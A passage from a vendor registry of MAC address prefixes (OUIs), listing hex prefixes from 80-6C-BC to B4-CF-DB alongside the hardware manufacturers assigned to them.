CO.,LTD. 80-6C-BC (hex) NET New Electronic Technology GmbH 80-71-1F (hex) Juniper Networks 80-76-93 (hex) Newag SA 80-7A-7F (hex) ABB Genway Xiamen Electrical Equipment CO., LTD 80-7D-1B (hex) Neosystem Co. Ltd. 80-7D-E3 (hex) Chongqing Sichuan Instrument Microcircuit Co.LTD. 80-81-A5 (hex) TONGQING COMMUNICATION EQUIPMENT (SHENZHEN) Co.,Ltd 80-91-2A (hex) Lih Rong electronic Enterprise Co., Ltd. 80-91-C0 (hex) AgileMesh, Inc. 80-94-6C (hex) TOKYO RADAR CORPORATION 80-97-1B (hex) Altenergy Power System,Inc. 80-9B-20 (hex) Intel Corporate 80-A1-D7 (hex) Shanghai DareGlobal Technologies Co.,Ltd 80-B2-89 (hex) Forworld Electronics Ltd. 80-B3-2A (hex) Alstom Grid 80-B6-86 (hex) Huawei Technologies Co., Ltd 80-BA-AC (hex) TeleAdapt Ltd 80-C6-3F (hex) Remec Broadband Wireless , LLC 80-C6-AB (hex) Technicolor USA Inc. 80-C6-CA (hex) Endian s.r.l. 80-C8-62 (hex) Openpeak, Inc 80-D0-19 (hex) Embed, Inc 80-EE-73 (hex) Shuttle Inc. 80-F5-93 (hex) IRCO Sistemas de Telecomunicación S.A. 80-FB-06 (hex) HUAWEI TECHNOLOGIES CO.,LTD 80-FF-A8 (hex) UNIDIS 84-00-D2 (hex) Sony Ericsson Mobile Communications AB 84-18-88 (hex) Juniper Networks 84-21-41 (hex) Shenzhen Ginwave Technologies Ltd. 84-24-8D (hex) Motorola Solutions Inc 84-25-DB (hex) Samsung Electronics Co.,Ltd 84-27-CE (hex) Corporation of the Presiding Bishop of The Church of Jesus Christ of Latter-day Saints 84-29-14 (hex) EMPORIA TELECOM Produktions- und VertriebsgesmbH & Co KG 84-2B-2B (hex) Dell Inc. 84-2B-50 (hex) Huria Co.,Ltd. 84-30-E5 (hex) SkyHawke Technologies, LLC 84-36-11 (hex) hyungseul publishing networks 84-3F-4E (hex) Tri-Tech Manufacturing, Inc. 84-48-23 (hex) WOXTER TECHNOLOGY Co. Ltd 84-5D-D7 (hex) Shenzhen Netcom Electronics Co.,Ltd 84-6E-B1 (hex) Park Assist LLC 84-8F-69 (hex) Dell Inc. 84-90-00 (hex) Arnold & Richter Cine Technik 84-97-B8 (hex) Memjet Inc. 84-A6-C8 (hex) Intel Corporate 84-A8-E4 (hex) Huawei Device Co., Ltd 84-A9-91 (hex) Cyber Trans Japan Co.,Ltd. 84-C7-27 (hex) Gnodal Ltd 84-C7-A9 (hex) C3PO S.A. 84-C9-B2 (hex) D-Link International 84-D3-2A (hex) IEEE P1905.1 84-D9-C8 (hex) Unipattern Co., 84-DB-2F (hex) Sierra Wireless Inc 84-DE-3D (hex) Crystal Vision Ltd 84-EA-99 (hex) Vieworks 84-F6-4C (hex) Cross Point BV 88-18-AE (hex) Tamron Co., Ltd 88-21-E3 (hex) Nebusens, S.L. 88-23-FE (hex) TTTech Computertechnik AG 88-25-2C (hex) Arcadyan Technology Corporation 88-41-C1 (hex) ORBISAT DA AMAZONIA IND E AEROL SA 88-43-E1 (hex) Cisco Systems 88-4B-39 (hex) Siemens AG, Healthcare Sector 88-53-2E (hex) Intel Corporate 88-53-D4 (hex) Huawei Technologies Co., Ltd 88-6B-76 (hex) CHINA HOPEFUL GROUP HOPEFUL ELECTRIC CO.,LTD 88-86-A0 (hex) Simton Technologies, Ltd. 88-87-17 (hex) CANON INC. 88-8B-5D (hex) Storage Appliance Corporation 88-8C-19 (hex) Brady Corp Asia Pacific Ltd 88-91-DD (hex) Racktivity 88-94-F9 (hex) Gemicom Technology, Inc. 88-95-B9 (hex) Unified Packet Systems Crop 88-97-DF (hex) Entrypass Corporation Sdn. Bhd. 88-98-21 (hex) TERAON 88-9F-FA (hex) Hon Hai Precision Ind. Co.,Ltd. 88-A5-BD (hex) QPCOM INC. 88-AC-C1 (hex) Generiton Co., Ltd. 88-AE-1D (hex) COMPAL INFORMATION(KUNSHAN)CO.,LTD 88-B1-68 (hex) Delta Control GmbH 88-B6-27 (hex) Gembird Europe BV 88-BA-7F (hex) Qfiednet Co., Ltd. 88-BF-D5 (hex) Simple Audio Ltd 88-C3-6E (hex) Beijing Ereneben lnformation Technology Limited 88-C6-63 (hex) Apple Inc 88-DD-79 (hex) Voltaire 88-E0-A0 (hex) Shenzhen VisionSTOR Technologies Co., Ltd 88-E0-F3 (hex) Juniper Networks 88-E7-12 (hex) Whirlpool Corporation 88-E7-A6 (hex) iKnowledge Integration Corp. 88-ED-1C (hex) Cudo Communication Co., Ltd. 88-F0-77 (hex) Cisco Systems 88-F4-88 (hex) cellon communications technology(shenzhen)Co.,Ltd. 88-FD-15 (hex) LINEEYE CO., LTD 8C-0C-A3 (hex) Amper 8C-11-CB (hex) ABUS Security-Center GmbH & Co. KG 8C-1F-94 (hex) RF Surgical System Inc. 8C-27-1D (hex) QuantHouse 8C-27-8A (hex) Vocollect Inc 8C-44-35 (hex) Shanghai BroadMobi Communication Technology Co., Ltd. 8C-4D-EA (hex) Cerio Corporation 8C-51-05 (hex) Shenzhen ireadygo Information Technology CO.,LTD. 8C-53-F7 (hex) A&D ENGINEERING CO., LTD. 8C-54-1D (hex) LGE 8C-56-C5 (hex) Nintendo Co., Ltd. 8C-58-77 (hex) Apple, Inc. 8C-59-8B (hex) C Technologies AB 8C-5C-A1 (hex) d-broad,INC 8C-5F-DF (hex) Beijing Railway Signal Factory 8C-64-0B (hex) Beyond Devices d.o.o. 8C-64-22 (hex) Sony Ericsson Mobile Communications AB 8C-70-5A (hex) Intel Corporate 8C-71-F8 (hex) Samsung Electronics Co.,Ltd 8C-73-6E (hex) Fujitsu Limited 8C-77-12 (hex) Samsung Electronics Co.,Ltd 8C-7B-9D (hex) Apple 8C-7C-B5 (hex) Hon Hai Precision Ind. Co.,Ltd. 8C-7C-FF (hex) Brocade Communications Systems, Inc. 8C-7E-B3 (hex) Lytro, Inc. 8C-82-A8 (hex) Insigma Technology Co.,Ltd 8C-84-01 (hex) PRIVATE 8C-89-A5 (hex) Micro-Star INT'L CO., LTD 8C-8A-6E (hex) ESTUN AUTOMATION TECHNOLOY CO., LTD 8C-8E-76 (hex) taskit GmbH 8C-90-D3 (hex) Alcatel Lucent 8C-92-36 (hex) Aus.Linx Technology Co., Ltd. 8C-94-CF (hex) Encell Technology, Inc. 8C-A0-48 (hex) Beijing NeTopChip Technology Co.,LTD 8C-A9-82 (hex) Intel Corporate 8C-B6-4F (hex) Cisco Systems 8C-B8-2C (hex) IPitomy Communications 8C-B8-64 (hex) AcSiP Technology Corp. 8C-C8-CD (hex) Samsung Electronics Co., LTD 8C-CF-5C (hex) BEFEGA GmbH 8C-D1-7B (hex) CG Mobile 8C-D6-28 (hex) Ikor Metering 8C-DB-25 (hex) ESG Solutions 8C-DD-8D (hex) Wifly-City System Inc. 8C-DE-52 (hex) ISSC Technologies Corp. 8C-E7-B3 (hex) Sonardyne International Ltd 8C-F9-C9 (hex) MESADA Technology Co.,Ltd. 90-00-4E (hex) Hon Hai Precision Ind. Co.,Ltd. 90-01-3B (hex) SAGEMCOM 90-02-A9 (hex) ZHEJIANG DAHUA TECHNOLOGY CO.,LTD 90-03-B7 (hex) PARROT 90-09-17 (hex) Far-sighted mobile 90-0A-3A (hex) PSG Plastic Service GmbH 90-0D-66 (hex) Digimore Electronics Co., Ltd 90-18-5E (hex) Apex Tool Group GmbH & Co OHG 90-18-AE (hex) Shanghai Meridian Technologies, Co. Ltd. 90-19-00 (hex) SCS SA 90-21-55 (hex) HTC Corporation 90-27-E4 (hex) Apple 90-2B-34 (hex) GIGA-BYTE TECHNOLOGY CO.,LTD. 90-2E-87 (hex) LabJack 90-34-2B (hex) Gatekeeper Systems, Inc. 90-34-FC (hex) Hon Hai Precision Ind. Co.,Ltd. 90-3A-A0 (hex) Alcatel-Lucent 90-3C-AE (hex) Yunnan KSEC Digital Technology Co.,Ltd. 90-3D-5A (hex) Shenzhen Wision Technology Holding Limited 90-3D-6B (hex) Zicon Technology Corp. 90-47-16 (hex) RORZE CORPORATION 90-4C-E5 (hex) Hon Hai Precision Ind. Co.,Ltd. 90-50-7B (hex) Advanced PANMOBIL Systems GmbH & Co. KG 90-51-3F (hex) Elettronica Santerno 90-54-46 (hex) TES ELECTRONIC SOLUTIONS 90-55-AE (hex) Ericsson, EAB/RWI/K 90-56-82 (hex) Lenbrook Industries Limited 90-5F-8D (hex) modas GmbH 90-61-0C (hex) Fida International (S) Pte Ltd 90-67-B5 (hex) Alcatel-Lucent 90-67-F3 (hex) Alcatel Lucent 90-6D-C8 (hex) DLG Automação Industrial Ltda 90-6E-BB (hex) Hon Hai Precision Ind. Co.,Ltd. 90-7F-61 (hex) Chicony Electronics Co., Ltd. 90-84-0D (hex) Apple, Inc 90-88-A2 (hex) IONICS TECHNOLOGY ME LTDA 90-8D-1D (hex) GH Technologies 90-8F-CF (hex) UNO System Co., Ltd 90-90-3C (hex) TRISON TECHNOLOGY CORPORATION 90-90-60 (hex) RSI VIDEO TECHNOLOGIES 90-92-B4 (hex) Diehl BGT Defence GmbH & Co. KG 90-A2-DA (hex) GHEO SA 90-A4-DE (hex) Wistron Neweb Corp. 90-A7-83 (hex) JSW PACIFIC CORPORATION 90-A7-C1 (hex) Pakedge Device and Software Inc. 90-B8-D0 (hex) Joyent, Inc. 90-B9-7D (hex) Johnson Outdoors Marine Electronics d/b/a Minnkota 90-C1-15 (hex) Sony Ericsson Mobile Communications AB 90-CF-15 (hex) Nokia Corporation 90-D1-1B (hex) Palomar Medical Technologies 90-D7-4F (hex) Bookeen 90-D7-EB (hex) Texas Instruments 90-D8-52 (hex) Comtec Co., Ltd. 90-D9-2C (hex) HUG-WITSCHI AG 90-E0-F0 (hex) IEEE P1722 90-E2-BA (hex) Intel Corporation 90-E6-BA (hex) ASUSTek COMPUTER INC. 90-EA-60 (hex) SPI Lasers Ltd 90-F2-78 (hex) Radius Gateway 90-F6-52 (hex) TP-LINK TECHNOLOGIES CO., LTD. 90-FB-5B (hex) Avaya, Inc 90-FB-A6 (hex) Hon Hai Precision Ind.Co.Ltd 94-0B-2D (hex) NetView Technologies(Shenzhen) Co., Ltd 94-0C-6D (hex) TP-LINK Technologies Co.,Ltd. 94-11-DA (hex) ITF Froschl GmbH 94-16-73 (hex) Point Core SARL 94-1D-1C (hex) TLab West Systems AB 94-20-53 (hex) Nokia Corporation 94-23-6E (hex) Shenzhen Junlan Electronic Ltd 94-2E-17 (hex) Schneider Electric Canada Inc 94-2E-63 (hex) Finsécur 94-31-9B (hex) Alphatronics BV 94-33-DD (hex) Taco Electronic Solutions, Inc. 94-39-E5 (hex) Hon Hai Precision Ind. Co.,Ltd. 94-3A-F0 (hex) Nokia Corporation 94-44-52 (hex) Belkin International, Inc. 94-46-96 (hex) BaudTec Corporation 94-51-03 (hex) Samsung Electronics 94-59-2D (hex) EKE Building Technology Systems Ltd 94-5B-7E (hex) TRILOBIT LTDA. 94-63-D1 (hex) Samsung Electronics Co.,Ltd 94-71-AC (hex) TCT Mobile Limited 94-81-A4 (hex) Azuray Technologies 94-85-7A (hex) Evantage Industries Corp 94-88-54 (hex) Texas Instruments 94-8B-03 (hex) EAGET Innovation and Technology Co., Ltd. 94-8D-50 (hex) Beamex Oy Ab 94-8F-EE (hex) Hughes Telematics, Inc. 94-9C-55 (hex) Alta Data Technologies 94-A7-BC (hex) BodyMedia, Inc. 94-AA-B8 (hex) Joview(Beijing) Technology Co. Ltd. 94-AE-61 (hex) Alcatel Lucent 94-BA-31 (hex) Visiontec da Amazônia Ltda. 94-C4-E9 (hex) PowerLayer Microsystems HongKong Limited 94-C6-EB (hex) NOVA electronics, Inc. 94-C7-AF (hex) Raylios Technology 94-CD-AC (hex) Creowave Oy 94-D0-19 (hex) Cydle Corp. 94-D7-23 (hex) Shanghai DareGlobal Technologies Co., Ltd 94-D9-3C (hex) ENELPS 94-DB-49 (hex) SITCORP 94-DD-3F (hex) A+V Link Technologies, Corp. 94-DE-0E (hex) SmartOptics AS 94-DF-58 (hex) IJ Electron CO.,Ltd. 94-E0-D0 (hex) HealthStream Taiwan Inc. 94-E2-26 (hex) D. ORtiz Consulting, LLC 94-E7-11 (hex) Xirka Dama Persada PT 94-E8-48 (hex) FYLDE MICRO LTD 94-F6-92 (hex) Geminico co.,Ltd. 94-F7-20 (hex) Tianjin Deviser Electronics Instrument Co., Ltd 94-FD-1D (hex) WhereWhen Corp 94-FE-F4 (hex) SAGEMCOM 98-03-A0 (hex) ABB n.v. Power Quality Products 98-03-D8 (hex) Apple, Inc. 98-0C-82 (hex) Samsung Electro Mechanics 98-0E-E4 (hex) PRIVATE 98-29-3F (hex) Fujian Start Computer Equipment Co.,Ltd 98-2C-BE (hex) 2Wire 98-2D-56 (hex) Resolution Audio 98-30-00 (hex) Beijing KEMACOM Technologies Co., Ltd. 98-35-71 (hex) Sub10 Systems Ltd 98-35-B8 (hex) Assembled Products Corporation 98-42-46 (hex) SOL INDUSTRY PTE., LTD 98-4A-47 (hex) CHG Hospital Beds 98-4B-4A (hex) Motorola Mobility Inc. 98-4B-E1 (hex) Hewlett-Packard Company 98-4E-97 (hex) Starlight Marketing (H. K.) Ltd. 98-58-8A (hex) SYSGRATION Ltd. 98-59-45 (hex) Texas Instruments 98-60-22 (hex) EMW Co., Ltd. 98-66-EA (hex) Industrial Control Communications, Inc. 98-6D-C8 (hex) TOSHIBA MITSUBISHI-ELECTRIC INDUSTRIAL SYSTEMS CORPORATION 98-73-C4 (hex) Sage Electronic Engineering LLC 98-82-17 (hex) Disruptive Ltd 98-89-ED (hex) Anadem Information Inc. 98-8B-5D (hex) SAGEM COMMUNICATION 98-8B-AD (hex) Corintech Ltd. 98-8E-34 (hex) ZHEJIANG BOXSAM ELECTRONIC CO.,LTD 98-8E-DD (hex) Raychem International 98-90-80 (hex) Linkpower Network System Inc Ltd. 98-94-49 (hex) Skyworth Wireless Technology Ltd. 98-AA-D7 (hex) BLUE WAVE NETWORKING CO LTD 98-BC-57 (hex) SVA TECHNOLOGIES CO.LTD 98-BC-99 (hex) Edeltech Co.,Ltd. 98-C8-45 (hex) PacketAccess 98-D6-BB (hex) Apple, Inc. 98-D8-8C (hex) Nortel Networks 98-DC-D9 (hex) UNITEC Co., Ltd. 98-E1-65 (hex) Accutome 98-E7-9A (hex) Foxconn(NanJing) Communication Co.,Ltd. 98-EC-65 (hex) Cosesy ApS 98-F5-37 (hex) zte corporation 98-F8-DB (hex) Marini Impianti Industriali s.r.l. 98-FC-11 (hex) Cisco-Linksys, LLC 98-FE-03 (hex) Ericsson - North America 9C-18-74 (hex) Nokia Danmark A/S 9C-1F-DD (hex) Accupix Inc. 9C-22-0E (hex) TASCAN Service GmbH 9C-28-BF (hex) Continental Automotive Czech Republic s.r.o. 9C-31-B6 (hex) Kulite Semiconductor Products Inc 9C-41-7C (hex) Hame Technology Co., Limited 9C-45-63 (hex) DIMEP Sistemas 9C-4A-7B (hex) Nokia Corporation 9C-4E-20 (hex) Cisco Systems 9C-4E-36 (hex) Intel Corporate 9C-4E-8E (hex) ALT Systems Ltd 9C-53-CD (hex) ENGICAM s.r.l. 9C-55-B4 (hex) I.S.E. S.r.l. 9C-57-11 (hex) Feitian Xunda(Beijing) Aeronautical Information Technology Co., Ltd. 9C-5B-96 (hex) NMR Corporation 9C-5C-8D (hex) FIREMAX INDÚSTRIA E COMÉRCIO DE PRODUTOS ELETRÔNICOS LTDA 9C-5D-95 (hex) VTC Electronics Corp. 9C-5E-73 (hex) Calibre UK Ltd 9C-64-5E (hex) Harman Consumer Group 9C-6A-BE (hex) QEES ApS. 9C-75-14 (hex) Wildix srl 9C-77-AA (hex) NADASNV 9C-7B-D2 (hex) NEOLAB Convergence 9C-80-7D (hex) SYSCABLE Korea Inc. 9C-8B-F1 (hex) The Warehouse Limited 9C-8E-99 (hex) Hewlett-Packard Company 9C-93-4E (hex) Xerox Corporation 9C-95-F8 (hex) SmartDoor Systems, LLC 9C-A1-34 (hex) Nike, Inc. 9C-A3-BA (hex) SAKURA Internet Inc. 9C-AD-EF (hex) Obihai Technology, Inc. 9C-AF-CA (hex) Cisco Systems 9C-B0-08 (hex) Ubiquitous Computing Technology Corporation 9C-B2-06 (hex) PROCENTEC 9C-B7-0D (hex) Liteon Technology Corporation 9C-C0-77 (hex) PrintCounts, LLC 9C-C0-D2 (hex) Conductix-Wampfler AG 9C-C7-D1 (hex) SHARP Corporation 9C-CA-D9 (hex) Nokia Corporation 9C-CD-82 (hex) CHENG UEI PRECISION INDUSTRY CO.,LTD 9C-DF-03 (hex) Harman/Becker Automotive Systems GmbH 9C-EB-E8 (hex) BizLink (Kunshan) Co.,Ltd 9C-F6-1A (hex) UTC Fire and Security 9C-F6-7D (hex) Ricardo Prague, s.r.o. 9C-F9-38 (hex) AREVA NP GmbH 9C-FF-BE (hex) OTSL Inc. A0-07-98 (hex) Samsung Electronics A0-0B-BA (hex) SAMSUNG ELECTRO-MECHANICS A0-0C-A1 (hex) SKTB "SKiT" A0-13-3B (hex) Copyright © HiTi Digital, Inc. A0-16-5C (hex) TangoTec Ltd. A0-18-59 (hex) Shenzhen Yidashi Electronics Co Ltd A0-21-B7 (hex) NETGEAR A0-23-1B (hex) TeleComp R&D Corp. A0-2E-F3 (hex) United Integrated Services Co., Led. A0-36-9F (hex) Intel Corporation A0-36-FA (hex) Ettus Research LLC A0-3A-75 (hex) PSS Belgium N.V. A0-40-25 (hex) Actioncable, Inc. A0-40-41 (hex) SAMWONFA Co.,Ltd. A0-42-3F (hex) Tyan Computer Corp A0-4E-04 (hex) Nokia Corporation A0-55-DE (hex) Pace plc A0-59-3A (hex) V.D.S. Video Display Systems srl A0-5A-A4 (hex) Grand Products Nevada, Inc. A0-5D-C1 (hex) TMCT Co., LTD. A0-5D-E7 (hex) DIRECTV, Inc. A0-5E-6B (hex) MELPER Co., Ltd. A0-69-86 (hex) Wellav Technologies Ltd A0-6A-00 (hex) Verilink Corporation A0-6C-EC (hex) RIM A0-6E-50 (hex) Nanotek Elektronik Sistemler Ltd. Sti. A0-71-A9 (hex) Nokia Corporation A0-73-32 (hex) Cashmaster International Limited A0-75-91 (hex) Samsung Electronics Co.,Ltd A0-78-BA (hex) Pantech Co., Ltd. A0-82-C7 (hex) P.T.I Co.,LTD A0-86-EC (hex) SAEHAN HITEC Co., Ltd A0-88-B4 (hex) Intel Corporate A0-8C-9B (hex) Xtreme Technologies Corp A0-98-05 (hex) OpenVox Communication Co Ltd A0-98-ED (hex) Shandong Intelligent Optical Communication Development Co., Ltd. A0-9A-5A (hex) Time Domain A0-A7-63 (hex) Polytron Vertrieb GmbH A0-AA-FD (hex) EraThink Technologies Corp. A0-B5-DA (hex) HongKong THTF Co., Ltd A0-B6-62 (hex) Acutvista Innovation Co., Ltd. A0-B9-ED (hex) Skytap A0-BF-A5 (hex) CORESYS A0-CF-5B (hex) Cisco Systems A0-DD-E5 (hex) SHARP CORPORATION A0-DE-05 (hex) JSC "Irbis-T" A0-E2-01 (hex) AVTrace Ltd.(China) A0-E2-95 (hex) DAT System Co.,Ltd A0-E9-DB (hex) Ningbo FreeWings Technologies Co.,Ltd A0-F2-17 (hex) GE Medical System(China) Co., Ltd. A0-F3-E4 (hex) Alcatel -Lucent IPD A4-01-30 (hex) ABIsystems Co., LTD A4-0C-C3 (hex) Cisco Systems A4-13-4E (hex) Luxul Wireless A4-1B-C0 (hex) Fastec Imaging Corporation A4-21-8A (hex) Nortel Networks A4-24-B3 (hex) FlatFrog Laboratories AB A4-29-B7 (hex) bluesky A4-33-D1 (hex) Fibrlink Communications Co.,Ltd. A4-38-FC (hex) Plastic Logic A4-46-FA (hex) AmTRAN Video Corporation A4-4B-15 (hex) Sun Cupid Technology (HK) LTD A4-50-55 (hex) busware.de A4-56-1B (hex) MCOT Corporation A4-5A-1C (hex) smart-electronic GmbH A4-5C-27 (hex) Nintendo Co., Ltd. A4-67-06 (hex) Apple Inc A4-79-E4 (hex) KLINFO Corp A4-7A-A4 (hex) Motorola Mobility, Inc. A4-7C-1F (hex) Global Microwave Systems Inc. A4-85-6B (hex) Q Electronics Ltd A4-90-05 (hex) CHINA GREATWALL COMPUTER SHENZHEN CO.,LTD A4-99-81 (hex) FuJian Elite Power Tech CO.,LTD. A4-9B-13 (hex) Burroughs Payment Systems, Inc. A4-A2-4A (hex) Cisco SPVTG A4-A8-0F (hex) Shenzhen Coship Electronics Co., Ltd. A4-AD-00 (hex) Ragsdale Technology A4-AD-B8 (hex) Vitec Group, Camera Dynamics Ltd A4-AE-9A (hex) Maestro Wireless Solutions ltd. A4-B1-21 (hex) Arantia 2010 S.L. A4-B1-97 (hex) Apple, Inc. A4-B1-EE (hex) H. ZANDER GmbH & Co. KG A4-B2-A7 (hex) Adaxys Solutions AG A4-B3-6A (hex) JSC SDO Chromatec A4-BA-DB (hex) Dell Inc. A4-BE-61 (hex) EutroVision System, Inc. A4-C0-E1 (hex) Nintendo Co., Ltd. A4-C2-AB (hex) Hangzhou LEAD-IT Information & Technology Co.,Ltd A4-D1-D1 (hex) ECOtality North America A4-D1-D2 (hex) Apple, Inc. A4-DA-3F (hex) Bionics Corp. A4-DB-2E (hex) Kingspan Environmental Ltd A4-DE-50 (hex) Total Walther GmbH A4-E3-2E (hex) Silicon & Software Systems Ltd. A4-E3-91 (hex) DENY FONTAINE A4-E7-E4 (hex) Connex GmbH A4-ED-4E (hex) Motorola Mobility, Inc. A4-EE-57 (hex) SEIKO EPSON CORPORATION A4-EF-52 (hex) Telewave Co., Ltd. A8-1B-18 (hex) XTS CORP A8-26-D9 (hex) HTC Corporation A8-39-44 (hex) Actiontec Electronics, Inc A8-40-41 (hex) Dragino Technology Co., Limited A8-49-A5 (hex) Lisantech Co., Ltd. A8-55-6A (hex) Pocketnet Technology Inc. A8-5B-B0 (hex) Shenzhen Dehoo Technology Co.,Ltd A8-5B-F3 (hex) Audivo GmbH A8-62-A2 (hex) JIWUMEDIA CO., LTD. A8-63-DF (hex) DISPL’AIRE CORPORATION A8-63-F2 (hex) Texas Instruments A8-6A-6F (hex) RIM A8-70-A5 (hex) UniComm Inc. A8-77-6F (hex) Zonoff A8-7B-39 (hex) Nokia Corporation A8-7E-33 (hex) Nokia Danmark A/S A8-87-92 (hex) Broadband Antenna Tracking Systems A8-87-ED (hex) ARC Wireless LLC A8-8C-EE (hex) MicroMade Galka i Drozdz sp.j. A8-92-2C (hex) LG Electronics A8-93-E6 (hex) JIANGXI JINGGANGSHAN CKING COMMUNICATION TECHNOLOGY CO.,LTD A8-98-C6 (hex) Shinbo Co., Ltd. A8-99-5C (hex) aizo ag A8-9B-10 (hex) inMotion Ltd. A8-B0-AE (hex) LEONI A8-B1-D4 (hex) Cisco Systems A8-BD-1A (hex) Honey Bee (Hong Kong) Limited A8-C2-22 (hex) TM-Research Inc. A8-CB-95 (hex) EAST BEST CO., LTD. A8-CE-90 (hex) CVC A8-D3-C8 (hex) Wachendorff Elektronik GmbH & Co. KG A8-E0-18 (hex) Nokia Corporation A8-E3-EE (hex) Sony Computer Entertainment Inc. A8-F2-74 (hex) Samsung Electronics A8-F4-70 (hex) Fujian Newland Communication Science Technologies Co.,Ltd. A8-F9-4B (hex) Eltex Enterprise Ltd. A8-FC-B7 (hex) Consolidated Resource Imaging AA-00-00 (hex) DIGITAL EQUIPMENT CORPORATION AA-00-01 (hex) DIGITAL EQUIPMENT CORPORATION AA-00-02 (hex) DIGITAL EQUIPMENT CORPORATION AA-00-03 (hex) DIGITAL EQUIPMENT CORPORATION AA-00-04 (hex) DIGITAL EQUIPMENT CORPORATION AC-02-CF (hex) RW Tecnologia Industria e Comercio Ltda AC-02-EF (hex) Comsis AC-06-13 (hex) Senselogix Ltd AC-0D-FE (hex) Ekon GmbH - myGEKKO AC-19-9F (hex) SUNGROW POWER SUPPLY CO.,LTD. AC-20-AA (hex) DMATEK Co., Ltd. AC-2F-A8 (hex) Humannix Co.,Ltd. AC-31-9D (hex) Shenzhen TG-NET Botone Technology Co.,Ltd. AC-34-CB (hex) Shanhai GBCOM Communication Technology Co. Ltd AC-44-F2 (hex) Revolabs Inc AC-47-23 (hex) Genelec AC-4A-FE (hex) Hisense Broadband Multimedia Technology Co.,Ltd. AC-4F-FC (hex) SVS-VISTEK GmbH AC-51-35 (hex) MPI TECH AC-54-EC (hex) IEEE P1823 Standards Working Group AC-58-3B (hex) Human Assembler, Inc. AC-5E-8C (hex) Utillink AC-61-23 (hex) Drivven, Inc. AC-67-06 (hex) Ruckus Wireless AC-6F-4F (hex) Enspert Inc AC-6F-BB (hex) TATUNG Technology Inc. AC-6F-D9 (hex) Valueplus Inc. AC-72-89 (hex) Intel Corporate AC-80-D6 (hex) Hexatronic AB AC-81-12 (hex) Gemtek Technology Co., Ltd. AC-81-F3 (hex) Nokia Corporation AC-83-17 (hex) Shenzhen Furtunetel Communication Co., Ltd AC-83-F0 (hex) Magenta Video Networks AC-86-74 (hex) Open Mesh, Inc. AC-86-7E (hex) Create New Technology (HK) Limited Company AC-8A-CD (hex) ROGER D.Wensker, G.Wensker sp.j. AC-93-2F (hex) Nokia Corporation AC-9A-96 (hex) Lantiq Deutschland GmbH AC-9B-84 (hex) Smak Tecnologia e Automacao AC-9C-E4 (hex) Alcatel-Lucent Shanghai Bell Co., Ltd AC-A0-16 (hex) Cisco Systems AC-AB-8D (hex) Lyngso Marine A/S AC-BE-75 (hex) Ufine Technologies Co.,Ltd. AC-BE-B6 (hex) Visualedge Technology Co., Ltd. AC-C9-35 (hex) Ness Corporation AC-CA-54 (hex) Telldus Technologies AB AC-CA-BA (hex) Midokura Co., Ltd. AC-CB-09 (hex) Hefcom Metering (Pty) Ltd AC-CC-8E (hex) Axis Communications AB AC-CE-8F (hex) HWA YAO TECHNOLOGIES CO., LTD AC-D1-80 (hex) Crexendo Business Solutions, Inc. AC-DE-48 (hex) PRIVATE AC-E3-48 (hex) MadgeTech, Inc AC-E8-7B (hex) Huawei Technologies Co., Ltd AC-E9-AA (hex) Hay Systems Ltd AC-EA-6A (hex) GENIX INFOCOMM CO., LTD. AC-F9-7E (hex) ELESYS INC. B0-1B-7C (hex) Ontrol A.S. B0-38-29 (hex) Siliconware Precision Industries Co., Ltd. B0-48-7A (hex) TP-LINK TECHNOLOGIES CO., LTD. B0-51-8E (hex) Holl technology CO.Ltd. B0-5B-1F (hex) THERMO FISHER SCIENTIFIC S.P.A. B0-5C-E5 (hex) Nokia Corporation B0-65-63 (hex) Shanghai Railway Communication Factory B0-6C-BF (hex) 3ality Digital Systems GmbH B0-75-D5 (hex) ZTE Corporation B0-7D-62 (hex) Dipl.-Ing. H. Horstmann GmbH B0-81-D8 (hex) I-sys Corp B0-89-91 (hex) LGE B0-90-74 (hex) Fulan Electronics Limited B0-91-34 (hex) Taleo B0-97-3A (hex) E-Fuel Corporation B0-99-28 (hex) Fujitsu Limited B0-9A-E2 (hex) STEMMER IMAGING GmbH B0-9B-D4 (hex) GNH Software India Private Limited B0-A1-0A (hex) Pivotal Systems Corporation B0-A7-2A (hex) Ensemble Designs, Inc. B0-AA-36 (hex) GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD. B0-B3-2B (hex) Slican Sp. z o.o. B0-B8-D5 (hex) Nanjing Nengrui Auto Equipment CO.,Ltd B0-BD-A1 (hex) ZAKLAD ELEKTRONICZNY SIMS B0-BF-99 (hex) WIZITDONGDO B0-C6-9A (hex) Juniper Networks B0-C8-AD (hex) People Power Company B0-CF-4D (hex) MI-Zone Technology Ireland B0-D0-9C (hex) Samsung Electronics Co.,Ltd B0-E3-9D (hex) CAT SYSTEM CO.,LTD. B0-E5-0E (hex) NRG SYSTEMS INC B0-E7-54 (hex) 2Wire B0-E9-7E (hex) Advanced Micro Peripherals B0-F1-BC (hex) Dhemax Ingenieros Ltda B4-01-42 (hex) GCI Science & Technology Co.,LTD B4-07-F9 (hex) SAMSUNG ELECTRO-MECHANICS B4-08-32 (hex) TC Communications B4-0B-7A (hex) Brusa Elektronik AG B4-0C-25 (hex) Palo Alto Networks B4-0E-DC (hex) LG-Ericsson Co.,Ltd. B4-14-89 (hex) Cisco Systems B4-21-1D (hex) Beijing GuangXin Technology Co., Ltd B4-28-F1 (hex) E-Prime Co., Ltd. B4-2A-39 (hex) ORBIT MERRET, spol. s r. o. B4-2C-BE (hex) Direct Payment Solutions Limited B4-35-F7 (hex) Zhejiang Pearmain Electronics Co.ltd. B4-37-41 (hex) Consert, Inc. B4-39-D6 (hex) ProCurve Networking by HP B4-3D-B2 (hex) Degreane Horizon B4-41-7A (hex) ShenZhen Gongjin Electronics Co.,Ltd B4-4C-C2 (hex) NR ELECTRIC CO., LTD B4-51-F9 (hex) NB Software B4-52-53 (hex) Seagate Technology B4-58-61 (hex) CRemote, LLC B4-5C-A4 (hex) Thing-talk Wireless Communication Technologies Corporation Limited B4-67-E9 (hex) Qingdao GoerTek Technology Co., Ltd. B4-74-9F (hex) askey computer corp B4-82-FE (hex) Askey Computer Corp B4-94-4E (hex) WeTelecom Co., Ltd. B4-99-BA (hex) Hewlett-Packard Company B4-9E-E6 (hex) SHENZHEN TECHNOLOGY CO LTD B4-A4-E3 (hex) Cisco Systems B4-A5-A9 (hex) MODI GmbH B4-AA-4D (hex) Ensequence, Inc. B4-B0-17 (hex) Avaya, Inc B4-B3-62 (hex) ZTE Corporation B4-B5-AF (hex) Minsung Electronics B4-B8-8D (hex) Thuh Company B4-C4-4E (hex) VXL eTech Pvt Ltd B4-C7-99 (hex) Motorola Solutions Inc. B4-C8-10 (hex) UMPI Elettronica B4-CF-DB (hex) Shenzhen Jiuzhou Electric 